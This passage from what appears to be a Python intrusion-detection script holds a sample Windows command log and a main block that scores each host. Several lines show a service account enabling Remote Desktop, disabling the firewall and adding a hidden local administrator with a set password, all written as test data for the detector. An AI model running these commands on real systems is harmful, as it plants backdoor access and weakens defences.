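2011-03-14 09:02:11|WS01|CORP\\svc_print|reg add "hklm\\system\\currentControlSet\\Control\\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
2011-03-14 09:02:12|WS01|CORP\\svc_print|reg add "hklm\\system\\currentControlSet\\Control\\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
2011-03-14 09:02:20|WS01|CORP\\svc_print|netsh firewall set opmode disable
2011-03-14 09:03:05|WS01|CORP\\svc_print|net user support1 P@ss1234 /add
2011-03-14 09:03:09|WS01|CORP\\svc_print|net localgroup administrators support1 /add
2011-03-14 09:03:15|WS01|CORP\\svc_print|net accounts /maxpwage:unlimited
2011-03-14 10:15:00|WS02|CORP\\helpdesk|net user jsmith NewPass!23
2011-03-14 10:16:00|WS03|CORP\\admin|reg query "hklm\\system\\currentControlSet\\Control\\Terminal Server" /v fDenyTSConnections
not a valid record
"""

if __name__ == "__main__":
    for host, f in analyze(SAMPLE_LOG.splitlines()).items():
        print(host, f["severity"], f["score"], ", ".join(f["rules"]))
```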